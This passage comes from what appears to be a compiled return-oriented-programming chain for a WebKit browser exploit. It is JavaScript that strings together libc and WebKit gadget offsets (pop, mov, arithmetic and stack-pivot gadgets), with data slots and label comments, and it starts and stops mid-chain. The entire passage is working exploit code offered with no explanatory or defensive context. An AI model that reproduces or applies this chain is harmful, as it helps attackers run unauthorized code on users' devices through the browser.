libc_base+763368 //pop rcx ]); //L5491: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5492: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5493: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L5494: db([10, 0]); // 0xa set_gadget(libc_base+763368,); //pop rcx //L5495: db([10, 0]); // 0xa set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx //L5435: libc_base+764760, //pop rsi ropchain+286616, //L5497 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+286632, //L5498 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+286600, //L5496 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5496: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5497: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5498: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+286792, //L5502 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+286760, //L5500 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+286776, //L5501 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5499: db([24, 0]); // 0x18 
set_gadget(webkit_base+3236123,); //pop r9 //L5500: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5501: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5502: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+286848, //L5504 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L5504: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+286976, //L5506 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+286992, //L5507 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+286960, //L5505 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5505: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5506: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5507: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+287088, //L5509 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+287072, //L5508 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5508: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5509: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+287184, //L5511 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L5510: db([4294967264, 4294967295]); // -0x20 set_gadget(libc_base+759608,); //pop rax //L5511: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760 
//pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+287264, //L5513 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5513: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+287320, //L5514 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5514: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+287400, //L5516 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5516: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5518: db([4294967256, 4294967295]); // -0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+287520, //L5521 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+287504, //L5519 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5519: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5521: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+287664, //L5524 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+287632, //L5522 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+287648, //L5523 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5522: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5523: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); 
//pop rax //L5524: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+287752, //L5526 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L5525: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L5526: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+287808, //L5527 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5527: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5529: db([4294967256, 4294967295]); // -0x28 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+287888, //L5531 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5531: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+287992, //L5532 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+288008, //L5533 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5532: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5533: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+288096, //L5535 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5535: db([0, 0]); // 0x0 
set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+288152, //L5536 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5536: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+288224, //L5539 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5539: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+288280, //L5540 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5540: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+288368, //L5542 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5542: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5544: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+288488, //L5547 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+288472, //L5545 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5545: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5547: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+288632, //L5550 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+288600, //L5548 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+288616, //L5549 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5548: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5549: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5550: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+288712, //L5551 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5551: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5553: db([64, 0]); // 0x40 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+288832, //L5556 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+288816, //L5554 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5554: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5556: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+288944, //L5557 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+288976, //L5559 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+288960, //L5558 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5557: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5558: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5559: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 
set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+289144, //L5562 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+755774, //mov rax, rsi libc_base+764760, //pop rsi ropchain+289112, //L5560 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+289128, //L5561 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5560: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5561: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5562: db([0, 0]); // 0x0 set_gadget(webkit_base+1438842,); //pop rdx db([0, 0]); // 0x0 set_gadgets([ webkit_base+24132920, //div rsi ; add rax, rcx libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+289224, //L5563 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5563: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5565: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L5567: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+289384, //L5570 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+289368, //L5568 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5568: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5570: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+289544, //L5575 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+289560, //L5576 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, 
//mov rax, rcx libc_base+764760, //pop rsi ropchain+289496, //L5572 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5572: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5573: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L5574: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5575: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5576: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+289672, //L5577+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+289664, //L5577 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L5577: db([0, 0]); // 0x0 set_gadgets([ ropchain+289688, //L5577+24 ropchain+290640, //L5571 libc_base+764760, //pop rsi ropchain+289728, //L5578 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5578: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5580: db([4294967256, 4294967295]); // -0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+289848, //L5583 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+289832, //L5581 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5581: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5583: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+289992, //L5586 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+289960, //L5584 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, 
//mov rax, rcx libc_base+764760, //pop rsi ropchain+289976, //L5585 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5584: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5585: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5586: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+290088, //L5588 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5587: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L5588: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5589: db([32, 0]); // 0x20 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+290192, //L5590 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+290208, //L5591 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5590: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5591: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+290384, //L5593 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+290400, //L5594 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+290368, //L5592 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5592: db([0, 0]); // 0x0 
set_gadget(libc_base+144605,); //pop rdi //L5593: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5594: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+290544, //L5597 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+290560, //L5598 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+290512, //L5595 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5595: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5596: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L5597: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5598: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+290632, //L5599 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5599: db([0, 0]); // 0x0 //L5571: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+290760, //L5602 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+290776, //L5603 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+290744, //L5601 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5601: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5602: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5603: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+290888, //L5605 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, 
//pop rsi ropchain+290936, //L5608 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+290904, //L5606 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5605: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5606: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5607: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5608: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+291048, //L5609+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+291040, //L5609 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L5609: db([0, 0]); // 0x0 set_gadgets([ ropchain+291064, //L5609+24 ropchain+291080, //L5604 libc_base+782311, //pop rsp ropchain+279792, //L5328 //L5604: //L5610: //L5322: libc_base+764760, //pop rsi ropchain+291120, //L5611 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5611: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5613: db([88, 0]); // 0x58 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+291240, //L5616 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+291224, //L5614 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5614: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5616: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+291416, //L5619 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, 
//pop rsi ropchain+291432, //L5620 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+291384, //L5617 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+291400, //L5618 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5617: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5618: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5619: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5620: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+291528, //L5622 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+291512, //L5621 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5621: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5622: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+291608, //L5623 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5623: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5625: db([80, 0]); // 0x50 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+291728, //L5628 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+291712, //L5626 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5626: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5628: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi 
ropchain+291904, //L5631 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+291920, //L5632 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+291872, //L5629 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+291888, //L5630 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5629: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5630: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5631: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5632: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+292016, //L5634 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+292000, //L5633 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5633: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5634: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+292096, //L5635 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5635: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5637: db([72, 0]); // 0x48 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+292216, //L5640 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+292200, //L5638 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5638: db([0, 0]); // 0x0 
set_gadget(libc_base+144605,); //pop rdi //L5640: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+292392, //L5643 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+292408, //L5644 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+292360, //L5641 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+292376, //L5642 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5641: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5642: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5643: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5644: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+292504, //L5646 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+292488, //L5645 webkit_base+660161, //mov [rsi], rax ; mov al, 